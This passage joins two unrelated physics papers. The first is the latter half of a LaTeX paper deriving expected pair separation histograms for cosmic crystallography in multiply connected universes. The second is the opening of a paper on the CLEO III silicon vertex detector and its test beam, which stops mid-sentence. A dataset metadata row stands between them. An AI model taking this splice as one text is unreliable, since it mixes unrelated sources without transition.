where, as usual, Card$(\Delta^{-1}(s))$ is the number of
elements of the set $\Delta^{-1}(s)$, and $\Delta$ is the map
\begin{eqnarray*}
\Delta : \mathcal{C} \times \mathcal{C} & \rightarrow
& [0,4R^2] \\
(p,q) & \mapsto & d^2(p,q) \; .
\end{eqnarray*}
Clearly, the distance $d(p,q)$ between sources $p,q \in
\mathcal{C}$ is calculated using the geometry one is concerned
with. The factor 1/2 in the def\/inition of $\eta$ accounts
for the fact that the pairs $(p,q)$ and $(q,p)$ are indeed
the same pair.
The next step is to divide the interval $(0,4R^2]$ in $m$
equal subintervals of length $\delta s = 4R^2/m$. Each
subinterval has the form
\begin{displaymath}
J_i = (s_i - \frac{\delta s}{2} \, , \, s_i + \frac{\delta
s}{2}] \qquad ; \qquad i=1,2, \dots ,m \; ,
\end{displaymath}
with centre
\begin{displaymath}
s_i = \,(i - \frac{1}{2}) \,\, \delta s \;.
\end{displaymath}
The PSH is then obtained from
\begin{equation}
\label{histograma}
\Phi(s_i)=\frac{2}{N(N-1)}\,\,\frac{1}{\delta s}\,
\sum_{s \in J_i} \eta(s) \;,
\end{equation}
where $N$ is the number of sources in the catalogue $\mathcal{C}$.
The coef\/f\/icient of the sum is a normalization constant such
that
\begin{equation}
\sum_{i=1}^m \Phi(s_i)\,\, \delta s = 1 \, .
\end{equation}
Note that the sum in~(\ref{histograma}) is just a counting of the
number of pairs of sources separated by a distance whose square
lies in the subinterval $J_i$, hence $\Phi(s_i)$ is a normalized
counting.
It should be stressed that throughout this paper we use normalized
histograms instead of just plots of countings as in~\cite{LeLaLu}
and~\cite{Fagundes-Gausmann}. In doing so we can compare histograms
built up from catalogues with a dif\/ferent number of sources.
Further, although the PSH is actually the plot of the function
$\Phi(s_i)$, the function $\Phi(s_i)$ itself can be looked upon as
the PSH. So, in what follows we shall refer to $\Phi(s_i)$ simply
as the PSH.
As mentioned in the previous section, in a multiply connected
universe the periodic distribution of images on $\widetilde{M}\,$
(due to the covering group) gives rise to correlations in their
positions, and these correlations can be translated into
correlations in distances between pairs of images.
For a better understanding on how these distance correlations
arise let us consider the same example used by Fagundes and
Gausmann~\cite{Fagundes-Gausmann} to clarify the method of
cosmic crystallography. In their work they have assumed that the
distribution of objects in $M$ is uniform and the catalogue is the
whole set of observable images. In the Euclidean 3-manifold
they have studied, take a $g$-pair $(p,gp)$ such that for a
generic point $p=(x,y,z)$ we have $gp=(x-L,-y+2L,-z)$. The squared
separation between these points is given by
\begin{equation}
\label{example}
d^2 = 5L^2 - 8Ly + 4y^2 + 4z^2 \; .
\end{equation}
{}From this equation we have the following: f\/irstly, that the
separation of any other neighboring $g$-pair%
\footnote{We say that two $g$-pairs $(p,gp)$ and $(q,gq)$ are
neighbors if the points $p$ and $q$, and thus the points $gp$ and
$gq$, are neighbors.}
$(q,gq)$ will be close to $d$; secondly,
several distant $g$-pairs are separated by approximately
the same distance; thirdly, one has that not all $g$-pairs
are separated by the same distance (these items hold for the
isometry $g$ used in this example, of course). Actually, the
separation of any $g$-pair in Euclidean geometry is independent
of the pair only when the isometry $g$ is a translation.
One can sum up by stating that from this example one might
expect that in general correlations associated to translations
manifest as spikes in PSH's, whereas correlations due to
other isometries will be evinced through small
deviations from the histogram due to uncorrelated pairs.
This conjecture will be proved in the following two sections.
The distribution of cosmic objects may not be exactly
homogeneous, nor any catalogue will consist of all the observable
sources. For instance, the objects may present some clustering
or may obey a fractal distribution, while luminosity threshold
and obscuration ef\/fects limit our observational
capabilities. We shall show in the following section that
the consideration of these aspects does not destroy the
above-described picture, which was qualitatively inferred from
general arguments and illustrated through the above specif\/ic
example.
\section{The expected PSH}
\label{pshexp}
\setcounter{equation}{0}
In this section we shall use elements from probability theory
(see for example~\cite{Rohatgi}) to show that the above
qualitative description of the distance correlations in a PSH
holds in a rather general framework. We shall make clear that
this picture does not depend on the construction rules one uses
to build a catalogue. Recall that the construction rules to build
a catalogue $\mathcal{C}$ from an observed universe $\mathcal{U}$
consist of a well-behaved distribution law,
of which the set of objects in $M(t_0)$ is a representative sample,
and of selection rules which dictate how the catalogue is obtained
{}from the set of all observable images $\mathcal{O}$.
The general underlying setting of the calculations in this section is
the existence of an ensemble of catalogues comparable to a given
catalogue $\mathcal{C}$ (real or simulated), with the same number
of sources $N$ and corresponding to the same constant curvature
3-manifold $M(t_0)$. So, the construction rules permit the
computation of probabilities and expected values of quantities which
depend on the sources in the catalogue $\mathcal{C}$.
Our basic aim now is to compute the expected number, $\eta_{exp}(s_i)$,
of observed pairs of cosmic sources in a catalogue $\mathcal{C}$ of the
ensemble with squared separations in $J_i$. Having $\eta_{exp}(s_i)$ we
clearly have the \emph{expected} pair separation histogram (EPSH) which
is given by
\begin{equation}
\label{def-EPSH}
\Phi_{exp}(s_i) = \frac{2}{N(N-1)}\,\,\frac{1}{\delta s} \,\,
\eta_{exp}(s_i) \, .
\end{equation}
We remark that the EPSH carries all the relevant information
of the distance correlations due to the covering group since
\begin{equation} \label{noise-def1}
\Phi(s_i) = \Phi_{exp}(s_i) + \mbox{statistical f\/luctuations} \; ,
\end{equation}
where $\Phi(s_i)$ is the PSH constructed with $\mathcal{C}$.
It can be shown (see Appendix A for a proof) that the expected number
$\eta_{exp}(s_i)$ can be decomposed into its uncorrelated
part and its correlated part as
\begin{equation}
\label{num-tot}
\eta_{exp}(s_i) = \eta_u(s_i) + \frac{1}{2}\, \sum_{g \in
\widetilde{\Gamma}} \eta_g(s_i) \;,
\end{equation}
where $\eta_u(s_i)$ is the expected number of observed
uncorrelated pairs of sources with squared separations in
$J_i$, i.e. pairs of sources that are not $\Gamma$-pairs;
and $\eta_g(s_i)$ is the expected number of observed $g$-pairs
whose squared separations are in $J_i$. $\widetilde{\Gamma}$
is the covering group $\Gamma$ without the identity map, and
the factor 1/2 in the sum accounts for the fact that, in
considering all non-trivial covering isometries, we are counting
each $\Gamma$-pair twice, since if $(p,q)$ is a $g$-pair,
then $(q,p)$ is a $(g^{-1})$-pair.
For each isometry $g \in \widetilde{\Gamma}$ let us consider
the function
\begin{eqnarray*}
X_g : \widetilde{M}(t_0) & \to & \; [0,\infty) \\
p \quad & \mapsto & d^2(p,gp) \; .
\end{eqnarray*}
This function is a random variable, and using the construction
rules we can calculate the probability of an observed $g$-pair
to be separated by a squared distance that lies in $J_i$,
\begin{equation}
\label{prob-g-pairs}
F_g(s_i) = P[X_g \in J_i] \; .
\end{equation}
The construction rules allow us to compute also the expected
number $N_g$ of $g$-pairs in a catalogue $\mathcal{C}$ with $N$
sources. Clearly in a catalogue with twice the number of sources
there will be $2N_g$ $g$-pairs. Actually, $N_g$ is proportional
to $N$ so we write
\begin{equation} \label{nug}
N_g = N \, \nu_g \; ,
\end{equation}
with $0 \leq \nu_g < 1$.
The expected number of observed $g$-pairs with squared separation
in $J_i$ is thus given by the product of $N_g$ times the
probability that an observed $g$-pair has its squared separation
in $J_i$,
\begin{equation} \label{nu_g}
\eta_g(s_i) = N \,\nu_g \, F_g(s_i) \; .
\end{equation}
In order to examine uncorrelated pairs, we now consider the
random variable
\begin{eqnarray*}
X : \widetilde{M}(t_0) \times \widetilde{M}(t_0) & \to & [0,\infty) \\
(p,q)\qquad & \mapsto & d^2(p,q) \; .
\end{eqnarray*}
The probability of an observed uncorrelated pair $(p,q)$ to be
separated by a squared distance that lies in $J_i$,
\begin{equation}
F_u(s_i) = P[X \in J_i] \; ,
\end{equation}
can also be calculated from the construction rules. Thus, the
expected number of observed uncorrelated pairs with squared
separation in $J_i$ is
\begin{equation} \label{eta_u}
\eta_u(s_i) = \left[\,\frac{1}{2}\,N(N-1)- \frac{1}{2}\,N \,\sum_{g
\in \widetilde{\Gamma}} \,\nu_g \,\right] F_u(s_i) \;,
\end{equation}
where we have used~(\ref{nu_g}) and that clearly the expected number
$N_u$ of uncorrelated pairs is such that
\begin{equation} \label{Nu}
N_u + \frac{1}{2}\,\sum_{g \in \widetilde{\Gamma}} \,N_g =
\frac{1}{2}\, N(N-1) \;.
\end{equation}
{}From~(\ref{def-EPSH}),(\ref{num-tot}), (\ref{eta_u}) and
(\ref{Nu}) an explicit expression for the EPSH is thus
\begin{equation}
\label{EPSH}
\Phi_{exp}(s_i) = \frac{1}{\delta s}\,\,\frac{1}{N-1}
\left[\,2\, \frac{N_u}{N} \,\,F_u(s_i) +
\,\sum_{g \in \widetilde{\Gamma}} \,\nu_g\, F_g(s_i)
\,\right] \; ,
\end{equation}
where the sum in (\ref{EPSH}) is a f\/inite sum since $\nu_g$
is nonzero only for a f\/inite number of isometries.
For multiply connected manifold $M$ def\/ining
\begin{eqnarray}
\Phi_{exp}^{u}(s_i) & = & \frac{1}{\delta s}\, F_u(s_i) \;, \label{EPSHu} \\
\Phi_{exp}^{g}(s_i) & = & \frac{1}{\delta s} \,F_g(s_i) \;, \label{EPSHg}
\end{eqnarray}
we obtain a more descriptive expression for the EPSH, namely
\begin{equation} \label{EPSH2}
\Phi_{exp}(s_i) = \frac{1}{N-1}\,\, [\,\nu_u\,\Phi_{exp}^{u}(s_i) +
\, \sum_{g \in \widetilde{\Gamma}} \nu_g\, \Phi_{exp}^g(s_i)
\, ] \;,
\end{equation}
where by analogy with (\ref{nug}) we ave def\/ined
$\nu_u = 2\,N_u/\,N\,$.
{}From~(\ref{EPSH2}) it is apparent that the EPSH corresponding
to a multiply connected manifold is an EPSH in which the
contributions arising from the $\Gamma$-pairs have been withdrawn,
plus a term that consists of a sum of individual contributions
{}from each covering isometry.
When the manifold $M(t_0)$ which gives rise to the comparable
catalogues is simply connected ($\widetilde{\Gamma}=\emptyset$)
all $N(N-1)/2$ pairs are uncorrelated, and so from~(\ref{def-EPSH})
one clearly has
\begin{equation} \label{EPSHsc}
\Phi^{sc}_{exp}\,(s_i) = \frac{2}{N(N-1)}\,\frac{1}{\delta s}\,\,
\eta^{sc}_{exp}\,(s_i)
= \frac{1}{\delta s} \,F_{sc}\,(s_i) \;,
\end{equation}
where $F_{sc}\,(s_i)$ is the probability that the two sources
be separated by a squared distance that lies in $J_i$.
It turns out that the combination (which can be obtained
{}from~(\ref{Nu}) and~(\ref{EPSH2}))
\begin{equation} \label{topsig1}
(N-1)[\,\Phi_{exp}\,(s_i) - \Phi^{sc}_{exp}\,(s_i)\,] =
\nu_u\,\, [\,\Phi^{u}_{exp}\,(s_i) - \Phi^{sc}_{exp}\,(s_i)\,]
+ \sum_{g \in \widetilde{\Gamma}} \nu_g\,
[\, \Phi^g_{exp}\,(s_i) - \Phi^{sc}_{exp}\,(s_i)\,]
\end{equation}
proves to exhibit a clear signal of the topology of $M(t_0)$
(see~\cite{GRT00}~--~\cite{GRT01}, which is already available
in gr-qc archive, for more details, including numeric simulation
and plots).
This motivates the def\/inition of the following quantity:
\begin{equation} \label{topsig2}
\varphi^S(s_i) =
\nu_u\,\,[\,\Phi^{u}_{exp}\,(s_i) - \Phi^{sc}_{exp}\,(s_i)\,]
+ \sum_{g \in \widetilde{\Gamma}} \nu_g\,
[\, \Phi^g_{exp}\,(s_i) - \Phi^{sc}_{exp}\,(s_i)\,] \;,
\end{equation}
which throughout this paper is referred to as \emph{topological
signature\/} of the multiply connected manifold $M(t_0)$,
and clearly arises from the ensemble of catalogues of
discrete sources $\mathcal{C}\,$.
Equation~(\ref{topsig2}) on the one hand makes explicit that
(i) $\Gamma$-pairs as well as uncorrelated pairs which arise
(both) from the covering isometries give rise to the topological
signature; on the other hand, it ensures that (ii)
the topological signature ought to arise in PSH's even
when there are only a few images for each object.
\section{Further results}
\label{fres}
\setcounter{equation}{0}
{}From eqs.~(\ref{prob-g-pairs}) and~(\ref{EPSHg}) we note that
when $g$ is a Clif\/ford translation (i.e. an isometry such
that for all $p \in \widetilde{M}(t_0)$, the distance
$|g|= d(p,gp)$ is independent of $p$) we have
\begin{eqnarray}
\Phi_{exp}^g(s_i) & = & \left\{ \begin{array}
{l@{\qquad}l}
0 & \mbox{if $\quad |g|^2 \,\notin\, J_i$} \\ (\delta s)^{-1} &
\mbox{if $\quad |g|^2 \,\in \,J_i$ .}
\end{array} \right.
\end{eqnarray}
Thus from equation~(\ref{EPSH2}) one has that the contribution
of each translation $g$ to the EPSH is a spike of amplitude
$\nu_g\,[\,(N-1)\delta s\,]^{-1}$ at a well-def\/ined
subinterval $J_{i_g}$ (say), minus a term proportional to
the EPSH $\Phi_{exp}^{u}(s_i)$
for all $i=1, \dots ,i_g, \dots , m$. On the other hand,
when $g$ is not a Clif\/ford translation, the separation $|g|$
depends smoothly on the $g$-pair because it is a
composition of two smooth functions: the distance function
and the isometry $g$. Moreover, the value it takes ranges
over a fairly wide interval, so $F_g(s_i)$ will be non-zero for
several subintervals $J_i$. In brief, from~(\ref{EPSH2})
we conclude that topological spikes in PSH's are due \emph{only} to
Clif\/ford translations, whereas other isometries manifest
as tiny deformations of the PSH corresponding to the
simply connected case.
We emphasize that the above general result holds regardless
of the underlying geometry, and for any set of construction
rules. Further, when one restricts the above result to specif\/ic
geometries, then one arrives at two rather important consequences,
which we shall discuss in what follows.
Let us f\/irst consider the consequence for the particular case
of Euclidean manifolds.
It is known that any compact Euclidean 3-manifold $M$ is
f\/initely covered by a 3-torus~\cite{Wolf}. Let $\Gamma$ be
the universal covering group of $M$, then the universal covering
group of that 3-torus (consisting exclusively of translations)
is a subgroup of $\Gamma$. Moreover, there is a covering 3-torus
of $M$ such that its covering group consists of all the translations
contained in $\Gamma$.%
\footnote{The simplest example of this is a cubic
\emph{half-twisted 3-torus}~\cite{Instantons}, or cubic
$\mathcal{G}_2$ manifold in Wolf's notation~\cite{Wolf},
which is double covered by a rectangular 3-torus with the same
square base but with a height that is the double of the base side.
This is easily seen by stacking two cubes def\/ining $\mathcal{G}_2$
one on top of the other, the common face being the one that is
twisted for an identif\/ication.}
Thus, PSH's of $M$ and of this minimal covering 3-torus,
built from comparable catalogues with the same number of sources,
have the same spike spectrum of topological origin, i.e. the
same set of topological spikes with equal positions and amplitudes.
Therefore the topological spikes alone are not suf\/f\/icient
for distinguishing these compact f\/lat manifolds, making clear
that even if the universe is f\/lat ($\Omega_{tot}=1$) the
spike spectrum is not enough for determining its global
shape.
Consider now the consequence of our major result for the
special case of hyperbolic manifolds. Since there are no
Clif\/ford translations in hyperbolic geometry~\cite{Ratcliffe},
there are no topological spikes in PSH's built from these manifolds.
This result was not expected from the outset in that it has been
claimed that spikes are a characteristic signature of topology
in cosmic crystallography, at least for f\/lat manifolds%
~\cite{LeLaLu,Fagundes-Gausmann} (see, however, in this regard
the references~\cite{LeLuUz}~--~\cite{FagGaus}).
As a matter of fact, this result is in agreement with simulations
performed in the cases of Weeks~\cite{LeLuUz} and Best~\cite{FagGaus}
hyperbolic manifolds (see, however, next section for a comparison
of ours and their results).
Incidentally, it can also be f\/igured out from~(\ref{EPSH2})
that when $g$ is not a translation, and since the probabilities
$F_g(s_i)$ are non-zero for several subintervals $J_i$, then
the contribution of these isometries to the EPSH are in practice
negligible for $N \approx 2000$ as used in~\cite{LeLaLu} and
very small for $N \approx 250$ as used in~\cite{Fagundes-Gausmann}.
In both papers these contributions are hidden by statistical
f\/luctuations and, thus, are not revealed by the isolated
PSH's they have plotted.
{}From what we have seen hitherto it turns out that cosmic
crystallography, as originally formulated, is not a
conclusive method for unveiling the shape of our universe
since (i) in the Euclidean case the topological spikes will
tell us that spacetime is multiply connected at some scale,
leaving in some instances its shape undetermined, and (ii)
in the hyperbolic case, as there are no translations (and
therefore no topological spikes), it is even impossible to
distinguish any hyperbolic manifold with non-trivial topology from
the simply connected manifold $H^3$. Improvements of the cosmic
crystallography method are therefore necessary.
\begin{sloppypar}
In the remainder of this section we will brief\/ly discuss a
f\/irst approach which ref\/ines upon that method.
We look for a means of reducing the statistical f\/luctuations
well enough to leave a visible signal of the non-translational
isometries in a PSH. On theoretical ground, the simplest way
to accomplish this is to use several comparable
catalogues, with approximately equal number of cosmic sources,
for the construction of a \emph{mean} pair
separation histogram (MPSH). For suppose we have $K$ catalogues
$\mathcal{C}_k$ ($k=1,2,\dots,K$) with PSH's given by
\end{sloppypar}
\begin{equation} \label{sample-PSH}
\Phi_k(s_i) = \frac{2}{N_k(N_k-1)}\, \frac{1}{\delta s}\,
\sum_{s \in J_i} \eta_k(s)
\end{equation}
with $N_k = \mbox{Card}(\mathcal{C}_k)$. The MPSH def\/ined
by
\begin{equation} \label{meanPhi}
<\Phi(s_i)>\; = \frac{1}{K} \,\sum_{k=1}^K \Phi_k(s_i)
\end{equation}
is, in the limit $K \to \infty$, approximately equal to
the EPSH. Actually, equality holds when all catalogues have
exactly the same number of sources. However, it can be
shown (see Appendix B for details) that even when the
catalogues do not have exactly the same number $N$ of
sources, in f\/irst order approximation we still
have
\begin{equation} \label{limit1}
\Phi_{exp}(s_i) = \lim_{K \rightarrow \infty} <\Phi(s_i)>\;.
\end{equation}
Elementary statistics tells us that the statistical f\/luctuations
in the MPSH are reduced by a factor of $1/\sqrt{K}$, which makes
at f\/irst sight the MPSH method very attractive.
It should be noticed, however, that since in practice it is
not at all that easy to obtain many comparable real catalogues of
cosmic sources, this method will hardly be useful in analyses
which rely on real catalogues. On the other hand, since there is no
problem in generating hundreds of comparable (simulated) catalogues
in a computer, the construction of MPSH's can easily be implemented
in simulations, and so the MPSH method is a suitable approach for
studying the role of non-translational isometries in PSH's.
The use of the MPSH technique to extract the
topological signature of non-translational isometries (including
numeric simulation) is discribed in~\cite{GRT00}~--~\cite{GRT01}.
\section{Conclusions and further remarks}
\label{concl}
\setcounter{equation}{0}
In this section we begin by summarizing our main results,
proceed by brief\/ly indicating possible approaches for further
investigations, and end by discussing the connection between
ours and the results recently reported in the referenaces%
~\cite{LeLuUz} and~\cite{FagGaus}.
\vspace{5mm}
\noindent \textbf{\large Main results}
\vspace{3mm}
In this work we have derived the expression~(\ref{EPSH2})
for the expected pair separation histogram (EPSH) for an ensemble
of comparable catalogues with the same number of sources, and
corresponding to spacetimes whose spacelike sections are any one
of the possible 3-manifolds of constant curvature. The EPSH
is essentially a typical PSH from which the statistical noise
has been withdrawn, so it carries all the relevant information
of the distance correlations due to the covering group of $M$.
The EPSH~(\ref{EPSH2}) we have obtained holds in a rather general
topological-geometrical-observational setting, that is to say it
holds when the catalogues of the ensemble obey a well-behaved
distribution law (needed to ensure that the sources are not
concentrated in small regions) plus a set of selection rules
(which dictate how the catalogues ${\cal C\/}$ are obtained
{}from the set of observable images ${\cal O}\,$).
It turns out that the EPSH of a multiply connected manifold is
an EPSH in which the contributions that arise from
the $\Gamma$-paris have been withdrawn, plus a sum of
individual contributions from each covering isometry.
{}From~(\ref{EPSH2}) and (\ref{topsig2}) we have also found
that the topological signature (contribution of the
multiply-connectedness) ought to arise in even when there are
just a few images of each object.
Our theoretical study of distance correlations in pair separation
histograms elucidates the ultimate nature of the spikes and the
role played by isometries in PSH's.
Indeed, from the expression~(\ref{EPSH2}) of the EPSH we obtain our
major consequence, namely that the spikes of topological origin in
single PSH's are only due to the translations of the covering group,
whereas correlations due to the other (non-translational) isometries
manifest as small deformations of the PSH of the underlying
universal covering manifold. This result holds regardless of
the (well-behaved) distribution of objects in the universe, and of
the observational limitations that constrain, for example, the
deepness and completeness of the catalogues, as long as they
contain enough $\Gamma$-pairs to yield a clear signal.
\begin{sloppypar}
Besides clarifying the ultimate origin of spikes and revealing
the role of non-translational isometries, the above-mentioned major
result gives rise to two others:
\end{sloppypar}
\begin{itemize}
\item
That Euclidean distinct manifolds which admit the same
translations on their covering group present the same
spike spectrum of topological nature. So, the set of topological
spikes in the PSH's is not suf\/f\/icient for distinguishing
these compact f\/lat manifolds, making clear that even if the
universe is f\/lat ($\Omega_{tot}=1$) the spike spectrum may not
be enough for determining its global shape;
\item
That individual pair separation histograms corresponding to
hyperbolic 3-manifolds exhibit no spikes of topological origin,
since there are no Clif\/ford translations in hyperbolic
geometry.
\end{itemize}
These two corollaries in turn ensure that cosmic crystallography,
as originally formulated, is not a conclusive method for unveiling
the shape of the universe and improvements of the method are
thus necessary.
Any means of reducing the statistical noise well enough for
revealing the correlations due to non-translational isometries
should be in principle considered.
Perhaps the simplest way to accomplish this is through the
use of the MPSH method that we have also presented; that
is to say by using several comparable catalogues to construct
MPSH's.
The major drawback of this approach, in practice, is the
dif\/f\/iculty of constructing comparable catalogues of real
sources.
Nevertheless, the MPSH method is suitable for studying
the contributions of non-translational isometries in PSH's by
computer simulations since there is no problem in constructing
hundreds of simulated comparable catalogues.
A detailed account of the MPSH technique, including
numeric simulation, can be found in~\cite{GRT00}~--~\cite{GRT01}.
\vspace{6mm}
\noindent \textbf{\large Further research}
\vspace{3mm}
Any other means of reducing the statistical
noise may play the role of extracting all distance correlations
instead of just those due to translations. Therefore, a good
approach to this issue is perhaps to study quantitatively the
noise of PSH's in order to develop f\/ilters. Another scheme for
extracting these correlations from PSH's is to modify what we
have def\/ined to be an observed universe to make stronger the
signal which results from the non-translational isometries.
These ideas are currently under investigation by our research
group.
The main disadvantages of the known statistical approaches to
determine the topology of our universe from discrete
sources are that they all assume that: (i) the scale factor
$a(t)$ is accurately known, so one can compute distances
{}from redshif\/ts; (ii) all objects are comoving to a
very good approximation, so multiple images are where
they ought to be; and (iii) the objects have very long
lifetimes, so there exist images of the same object at very
dif\/ferent distances from one of our images. These are rather
unrealistic assumptions, and no method will be ef\/fective
unless it abandons these simplifying premises.
Our idea of a suitable choice of data in catalogues (def\/ined
to be a choice of observed universe) seems to be powerful
enough to circumvent these problems. Indeed, if one takes as
observed universe a thin spherical shell, instead of a ball,
all the sources will be at almost the same distance from the
observer, and (i) we do not need to know what this distance
is since we can look for angular correlations between pairs
of sources, instead of distance correlations, therefore avoiding
the need of knowing the scale factor, (ii) it is unimportant
whether they are comoving sources because all of them are now
contemporaneous, and so (iii) it is also irrelevant if they
have short lifetimes. In the thin spherical shell one can
look for angular correlations among $\Gamma$-pairs instead
of the distance correlations of the crystallographic method.
This approach is also currently under study by our research
group.
\vspace{6mm}
\noindent \textbf{\large A Comparison}
\vspace{3mm}
In what follows we shall discuss the connection between
our results and those of references~\cite{LeLuUz,FagGaus}.
The results we have derived regarding PSH's for hyperbolic manifolds
do not match with the explanation given in~\cite{LeLuUz}
for the absence of spikes.
Indeed, in~\cite{LeLuUz} it is argued that two types of pairs of
images can give rise to spikes, namely \emph{type I} and \emph{type II}
pairs.
Considering these types of pairs they argue that in their simulated
PSH's built for the Weeks manifold there are no spikes because:
(i) the number of \emph{type I} pairs is too low; and (ii) \emph{type II}
pairs cannot appear in hyperbolic manifolds.
It should be noticed from the outset that the \emph{type II} pairs
in~\cite{LeLuUz} are nothing but the $\Gamma$-pairs of the present
article, whereas \emph{type I} pairs are not the uncorrelated pairs of
this paper. Now, since we have shown that (i) $\Gamma$-pairs as well
as uncorrelated pairs which arise (both) from the covering isometries
give rise to the topological signature for multiply-connected
manifolds, and (ii) the topological signal of $g$-pairs is a spike
(in a PSH) only if $g$ is a Clif\/ford translation, then the only
reason for the absence of spikes of topological origin in
PSH's corresponding to hyperbolic manifolds is that there is no
Clif\/ford translation in hyperbolic geometry.
Further, that the small number of~\emph{type I} pairs is not
responsible for the absence of spikes is endorsed by the
PSH for the Best manifold reported in~\cite{FagGaus}, which was
performed for an observed universe large enough so that it
contains in the mean approximately 30 topological images for
each cosmic object; and yet no spikes whatsoever of topological
origin were found in the PSH.
Using expression~(\ref{EPSH2}) for the EPSH one can also
clarify the ef\/fect of subtracting from the
PSH corresponding to a particular 3-manifold the PSH of
the underlying simply connected covering manifold. This type
of dif\/ference has been performed for simulated
comparable catalogues
(with equal number of images and identical cosmological
parameters) for a Best and $H^3$ manifolds~\cite{FagGaus}.
In general the plots of that dif\/ference exhibit a fraction
$1/(N-1)$ of the topological signature of the isometries plus
(algebraically) the f\/luctuations corresponding to both PSH's
involved, namely the PSH for the underlying simply connected
space and the PSH for the multiply connected 3-manifold itself.
To understand that this is so, let us rewrite eq.~(\ref{noise-def1})
as
\begin{equation}
\label{noise-def2}
\Phi(s_i) = \Phi_{exp}(s_i) + \rho\,(s_i) \; ,
\end{equation}
where $\rho\,(s_i)$ denotes the noise (statistical f\/luctuations) of
$\Phi(s_i)$.
Using the decomposition~(\ref{noise-def2}) together with~%
(\ref{topsig2}) one easily obtains
\begin{equation} \label{FG-dif}
\Phi(s_i) - \Phi^{sc}(s_i) = \frac{1}{N-1}\,\varphi^{S}(s_i)
+ \, \rho\,(s_i)- \rho^{sc}(s_i) \; ,
\end{equation}
where $\varphi^{S}(s_i)$ denotes the topological signature,
which is given by~(\ref{topsig2}).
According to (\ref{topsig1}), (\ref{topsig2}) and (\ref{noise-def2}),
had they examined the dif\/ference $\Phi(s_i) - \Phi_{exp}^{sc}(s_i)$,
between the PSH built from that Best manifold and the EPSH for the
corresponding covering space, they would have expurgated
the noise $\rho^{sc}(s_i)$, and thus their plot
(f\/ig.~3 in~\cite{FagGaus}) would simply contain
a superposition of the topological signature
and just one noise, $\rho\,(s_i)$.
As a matter of fact, the ``wild oscillations in the scale of the
bin width'' they have found are caused by the superposition of
the two statistical f\/luctuations $\rho^{sc}(s_i)$ and
$\rho\,(s_i)$, whereas the ``broad pattern on the scale of
$R_0$'' ought to carry basic features of the topological
signature corresponding to the Best manifold they have examined.
But again, a detailed account of these points is a matter that
has been discussed in~\cite{GRT00}~--~\cite{GRT01}.
Finally, regarding the peaks of ref.~\cite{Fagundes-Gausmann}
it is important to bear in mind that graphs tend to be ef\/fective
mainly to improve the degree of intuition, to raise questions to
be eventually explained, and for substantiating theoretical results.
Often, however, they do not constitute a proof for a result, such
as the EPSH~(4.12) we have formally derived from rather general
f\/irst principles. A good example which shows the limitation
of the conclusions one can withdraw from such graphs comes exactly
{}from the PSH shown in f\/ig.~1 of ref.~\cite{Fagundes-Gausmann},
where there is a signif\/icant peak which according to
our results clearly {\em cannot\/} be of topological origin
because it does not correspond to any translation.
Note, however, that just by examining that graph one cannot at all
decide whether that sharp peak is of topological nature or
arises from purely statistical f\/luctuations.
In brief, just by examining PSH's one cannot at all distinguish between
spikes of topological origin from sharp peaks of purely statistical
nature --- our statistical analysis of the distance correlations in
PSH's elucidates the ultimate role of all types of isometries (in PSH's)
and are necessary to separate the spikes (sharp peaks) of
dif\/ferent nature.
\section*{Acknowledgements}
We thank the scientif\/ic agencies CNPq, CAPES
and FAPERJ for f\/inancial support. G.I.G. is grateful
to Helio Fagundes for introducing him to the method of
cosmic crystallography and to Evelise Gausmann for fruitful
conversations.
| 2024-02-18T23:40:14.132Z | 2002-02-21T03:33:04.000Z | algebraic_stack_train_0000 | 1,761 | 10,044 |
|
proofpile-arXiv_065-8649 | \section{Introduction}
The Cornell $e^+e^-$\ collider (CESR) is currently being upgraded to a luminosity
in excess of
$1.7\times 10 ^{33} {\rm cm }^{-2}{\rm s}^{-1}$. In parallel the CLEO III
detector is undergoing some major improvements.
One key
element of this upgrade is the construction of a four layer double-sided
silicon tracker.
This detector
spans the radial distance from 2.5 cm to 10.1 cm and cover 93\%
of the solid angle surrounding the interaction region. The
outermost layer is 55 cm long and will present a large
capacitive load to the front-end electronics. The innermost layer must
be capable of sustaining large singles rates typical of a detector
situated near an interaction region.
A novel feature of CLEO III is a state of the art particle identification system that
will provide excellent hadron identification at all the momenta relevant to
the study of the decays of B mesons produced at the $\Upsilon(4S)$\ resonance. The technique
chosen is a proximity focused Ring Imaging Cherenkov detector
(RICH)~\cite{upsil}
in a barrel geometry occupying 20 cm of radial space between the tracking system
and the CsI electromagnetic calorimeter.
The physics reach of CLEO III is quite exciting: the increased sensitivity of the upgraded
detector, coupled with the higher data sample available, will provide a great sensitivity
to a wide variety of rare decays, CP violating asymmetries in rare decays and precision
measurements of several Cabibbo-Kobayashi-Maskawa matrix elements.
\section{Vertex Detector Design}
The barrel-shaped CLEO III Silicon Tracker (Si3) is composed of 447 identical sensors combined
into 61 ladders. The sensors are double sided with ${\rm r}\phi$ readout on the n side and
z strips on the p side. The strip pitch is 50 $\mu$m on the n side and 100
$\mu$m on the p side.
Readout hybrids are attached at both ends of the ladders, each reading
out half of the ladder sensors. More details on the detector design can be found elsewhere.~\cite{ian} Sensors and
front end electronics are connected by flex circuits that have traces with a 100 $\mu$m pitch on
both sides, being manufactured by General Electric, Schenectady, New York.
All the layers are composed of identical sensors. In order to simplify the sensor
design, the detector biasing resistors and the coupling capacitors have been removed from
the sensor into a dedicated R/C chip, mounted on the hybrid. Another key feature in the sensor
design is the so called ``atoll'' geometry of the p-stop barriers, using isolated p-stop rings
surrounding individual n-strips. Furthermore a reverse bias can be applied to the p-stop barriers through a
separate electrode. Thus
the parasitic capacitance associated with these insulation barriers can be significantly
reduced with a corresponding reduction of the sensor noise in the frequency range
of interest.~\cite{george}
The middle chip in the readout chain is the FEMME preamplifier/shaper VLSI device.
It has an excellent noise performance. At the shaping time of 2$\mu$s, well matched to the CLEO III
trigger decision time, its equivalent noise charge is measured as:
\begin{equation}
ENC = 149 e+ 5.5 e/pF \times C_{in},
\end{equation}
giving satisfactory noise performance also with the high input capacitances in the outer layer
sensors. More details on the design and performance of this device can be found elsewhere.~\cite{osu}
The last chip in the readout chain is the SVX\_CLEO digitizer and
sparsifier.~\cite{george} Both these chips are manufactured utilizing radiation -hard CMOS technology from
Honeywell.
\section{The Si3 test beam run}
The silicon sensors have been tested in several test beam runs that took place at CERN in the
last few months. The sensors, flex circuits, and R/C chips used were the same ones planned
for the final system. However the readout electronics used was not
the combination of FEMME + SVX\_CLEO, but the low noise VA2 chip produced
by IDE AS, Norway~\cite{einar} with digitization implemented in the remote data acquisition
system.
The data were collected inserting the Si3 sensor in the test beam set-up used by the RD42
collaboration~\cite{rd42} to test their diamond sensors. A 100 GeV $\pi$ beam was used and the
